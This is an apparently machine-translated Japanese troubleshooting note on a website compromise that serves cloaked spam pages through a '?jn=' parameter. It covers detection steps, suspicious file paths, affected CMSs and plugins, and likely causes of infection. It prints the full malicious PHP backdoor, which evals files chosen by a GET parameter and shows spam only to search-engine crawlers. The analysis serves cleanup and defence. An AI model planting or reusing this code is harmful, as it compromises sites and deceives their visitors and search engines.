説明
サイトに表示されたリンクとそうでないリンクが表示されます。たとえば、サイトの構造と、「左」のURLとは異なるURLの元の外観が明確にわかります。 特に、フォームのリンクは検索エンジンのインデックスに表示されます。
www.site.ru/?jn=xxxxxxxx
トラブルシューティング
Yandex Webmasterはまだ回答していませんが、GoogleのWebmaster用ツールでは、サイトのハッキングの可能性について警告が発行されます。 検索の推奨事項も表示されます。 残念ながら、それらは非常に一般的であり、問題の特定の検索には時間がかかります。 サイトのアンチウイルスおよびオンラインアナライザー-結果を出しません。 ペンのみ。
オプションA:難読化されていないコード
- 変数$ _GET ['jn']を使用するソースと方法を探しています。
- 次に、コードによって、どこで誰ががらくたを見ます(例:\ js \ swfupload \ plugins \ jquery \)
オプションB:難読化されたコード
- 「?Jn = "の後に名前が付いたファイルがあるディレクトリを探しています。
- images / c0nfv.phpのような疑わしい実行可能ファイルを探しています
- 「/img/icon/thumb/jquery.php」のようなファイルがあるパスを検索できます
- CMS構成日を確認する
- base.phpファイルの存在(正確性)を確認することをお勧めします-これはウイルスの本体であり、コードは難読化されています
- jquery.phpの日付を確認し、Googleのウェブマスターツールを監視して、ウイルスが検出された日付と比較します。
会う
- CMS:Joomla、WordPress、DLE、PrestaShop、HostCMS
- プラグイン:ImageZoomer、SWFupload、BlockCategories
- jQueryを使用するほとんどすべてのプラグインと、管理者が設定に達していない場所で発生する可能性が高くなります。
カットされた(焦点が合っていない)悪意のあるコードの完全なコード。
<?php if(isset($_GET['jn'])){ini_set/**/(strrev("gnitroper_rorre"),0);include "images/c0nfv.php";$uhvuusgp=str_replace('..','',$_GET[$qjkx]);if(is_file($ftdavmbe.'/'.$uhvuusgp)){header('Content-Type: text/html; charset=windows-1251',false);echo eval/**/('?>'.join("",file($ftdavmbe."/$uhvuusgp")).'<?');die;}}if(preg_match("/(yandex|google)/i", $_SERVER['HTTP_USER_AGENT'])){ini_set/**/(strrev("gnitroper_rorre"),0);include "images/c0nfv.php";if(is_file($ftdavmbe."/db.php")){include $ftdavmbe."/db.php";$jxbecpzx=preg_replace("/[0]*$/","", preg_replace("/\.*/","",(string)sprintf('%f', hexdec(sha1($_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'])))));$iwtcrjis=substr($jxbecpzx,20,3);if(substr($iwtcrjis,0,1)==0){do{$x++;$iwtcrjis=substr($jxbecpzx,20+$x,3);}while(substr($iwtcrjis,0,1)==0);}include $ftdavmbe."/".$iwtcrjisy[$iwtcrjis];echo mb_convert_encoding($ohjjpibn[72], 'UTF-8', 'Windows-1251');}}?>
ハッキングの理由
最も可能性の高い3つのオプション:
- サーバー上の記録用のオープンディレクトリ。
- サイトで実行されるソフトウェアの脆弱性は、通常無料のCMS(コンテンツ管理システム)です。 たとえば、古くて安全でないバージョンを使用している場合、
- サイトでサードパーティのプラグインをハックします(JQUERYを使用)。